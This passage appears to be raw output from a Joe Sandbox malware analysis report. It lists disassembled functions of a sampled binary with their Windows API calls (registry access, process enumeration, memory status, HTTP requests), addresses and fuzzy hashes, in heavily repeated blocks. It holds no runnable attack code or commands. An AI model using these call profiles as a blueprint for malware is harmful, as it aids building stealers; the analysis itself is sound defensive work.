                                                                                                                                                                        • Opcode Fuzzy Hash: c94459e4085fe888039338f2c7fdbaf626c6212497e0a00956e94f0ed3ebcbd5
                                                                                                                                                                        • Instruction Fuzzy Hash: 52F0EC76604214ABD700DB58EC84D9BB3ECEB88614F44483AFA99C3311E674E955CB66
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(?,0066C334,00000000,00020019,?), ref: 00431E73
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID: ?
                                                                                                                                                                        • API String ID: 71445658-1684325040
                                                                                                                                                                        • Opcode ID: 754043c0255be4800ef8b4efe25c51af904ae3d8f01cb9ee33039990bf50625b
                                                                                                                                                                        • Instruction ID: b386336a90e49fb010f20b4bf0df57d910b683dc075ac6c0aeeb129a0fe4804c
                                                                                                                                                                        • Opcode Fuzzy Hash: 754043c0255be4800ef8b4efe25c51af904ae3d8f01cb9ee33039990bf50625b
                                                                                                                                                                        • Instruction Fuzzy Hash: 85018C76309340AFD314EF25DC94D6ABBEABFCA304F12815DE8448B274DAB05840DF16
                                                                                                                                                                        APIs
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00431C8C
                                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00431CB8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocGlobalHeapMemoryStatus
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3630205914-0
                                                                                                                                                                        • Opcode ID: a14f4d3335bee6de17cec28eebcdb48c0d3f9895553d3df1c2003d7369c51479
                                                                                                                                                                        • Instruction ID: 6e0525b4c5a95ce5f74839c56e00994e3795a20e22c33a4271fb97e58d292a7a
                                                                                                                                                                        • Opcode Fuzzy Hash: a14f4d3335bee6de17cec28eebcdb48c0d3f9895553d3df1c2003d7369c51479
                                                                                                                                                                        • Instruction Fuzzy Hash: E7F031B15462609FC710EB26CCA8D073BF8EB89710F0051B8F949CB260E7B49800CFA6
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00416C6B
                                                                                                                                                                        • HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 00416C85
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HttpRequestSendlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2340568100-0
                                                                                                                                                                        • Opcode ID: d8d0c8a112bad772208592fb1b7c5199d59aa7278cbe8e962771c0aab1caa1b3
                                                                                                                                                                        • Instruction ID: 02981bb0b1863b1f76db7fcd19572b46f58356ea9066f4ed27385ea7721e9549
                                                                                                                                                                        • Opcode Fuzzy Hash: d8d0c8a112bad772208592fb1b7c5199d59aa7278cbe8e962771c0aab1caa1b3
                                                                                                                                                                        • Instruction Fuzzy Hash: E60124B5B002098FCB01DF98DD849ADB7BAFF883057140568E814EB321E770AE02CB95
                                                                                                                                                                        APIs
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00431323
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,0066C297,00000000,00020119), ref: 00431346
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocHeapOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1634843882-0
                                                                                                                                                                        • Opcode ID: 2d2e5c62e765c56f1f9c90fd74c97b950ac767af1be2f57f1ad5ca224b7138aa
                                                                                                                                                                        • Instruction ID: cb714be1cb78ad3488e5be40aca8c83fda28867cb14de00c6d99edea90c43225
                                                                                                                                                                        • Opcode Fuzzy Hash: 2d2e5c62e765c56f1f9c90fd74c97b950ac767af1be2f57f1ad5ca224b7138aa
                                                                                                                                                                        • Instruction Fuzzy Hash: 8AF01D79A01511BFE2149B25DD4DE1A7AA9EF89714B41C4ACF9089B268E670B800CAA1
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0043A486
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,0066C80C,00000000,00020119,?), ref: 0043A4AE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Openmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 180050240-0
                                                                                                                                                                        • Opcode ID: 32fb308a3ccf757fad1d81e91b145da98cf2ee356089b5666b2ab3eb2d30ffbe
                                                                                                                                                                        • Instruction ID: f319a1c7703fd60fee2f0779ee55cfb6bb2f4a1940543228483e3d4c1e66d365
                                                                                                                                                                        • Opcode Fuzzy Hash: 32fb308a3ccf757fad1d81e91b145da98cf2ee356089b5666b2ab3eb2d30ffbe
                                                                                                                                                                        • Instruction Fuzzy Hash: 9FF0BE7194121AAFD310DBA4DC89DAB7B3EEBC4308F004129F9049B285FBB16E40CBE1
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004348C0
                                                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 004348CF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2353314856-0
                                                                                                                                                                        • Opcode ID: d16b4d3c40b6bd1133ddcb9e303fbe689c60a381ce20c6f05091dff0cf63d514
                                                                                                                                                                        • Instruction ID: 159a82d815871cdb5885c00ab62980b7a67d9e0599634f310490cd6a668de9ab
                                                                                                                                                                        • Opcode Fuzzy Hash: d16b4d3c40b6bd1133ddcb9e303fbe689c60a381ce20c6f05091dff0cf63d514
                                                                                                                                                                        • Instruction Fuzzy Hash: B9F0A0322016519FD310AF24DC89F6A7BE8EF49390F064028F444DF6E0D7709821CB56
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004349E0
                                                                                                                                                                        • Process32First.KERNEL32(00000000), ref: 004349EF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2353314856-0
                                                                                                                                                                        • Opcode ID: 734e7393436822b14d7a173c9a00091c6288ef1f53c69016cc522e7643221ecd
                                                                                                                                                                        • Instruction ID: 12dcd21c715183130a2b389f3e35df8a9c847fcf6acd87ec3e21385f8693035a
                                                                                                                                                                        • Opcode Fuzzy Hash: 734e7393436822b14d7a173c9a00091c6288ef1f53c69016cc522e7643221ecd
                                                                                                                                                                        • Instruction Fuzzy Hash: 7AF030713012189FD7709B19DD4DF9677E8EB4A700F044028B948DB3D0E6649816CB95
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004346E0
                                                                                                                                                                        • Process32First.KERNEL32(00000000), ref: 004346EF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2353314856-0
                                                                                                                                                                        • Opcode ID: 449c124edec59f0f8e1885be54e72448e93be717fbd730a408a16dc21b69502b
                                                                                                                                                                        • Instruction ID: e51a445a08013656bc54a330da56f2ec570e2be12ad10c0311373ecd3626a404
                                                                                                                                                                        • Opcode Fuzzy Hash: 449c124edec59f0f8e1885be54e72448e93be717fbd730a408a16dc21b69502b
                                                                                                                                                                        • Instruction Fuzzy Hash: D1F06D34340605AFD760AF59EC8DF563BECAB89740F1144A8F914DB3D2D670EC008BA6
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
